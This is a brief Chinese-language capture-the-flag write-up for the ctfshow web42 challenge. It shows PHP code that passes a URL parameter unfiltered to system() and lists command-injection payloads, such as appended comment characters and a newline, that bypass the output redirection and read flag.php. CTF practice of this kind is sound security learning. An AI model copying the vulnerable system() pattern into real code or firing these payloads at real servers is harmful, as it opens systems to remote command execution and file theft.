ctfshow-web42(命令执行)

本文主要是介绍ctfshow-web42(命令执行)，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

shell重定向

/dev/null 2>&1

让所有的输出流（包括错误的和正确的）都定向到空设备丢弃

 <?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 20:51:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");
}else{
    highlight_file(__FILE__);
} 

要让 /dev/null 2>&1 不能执行

?c=ls;//
或
?c=ls;%0a
?c=ls;*/
?c=ls;/*

%26和|| wp上说也可以，但是我、用不了

?c=cat flag.php;//

这篇关于ctfshow-web42(命令执行)的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！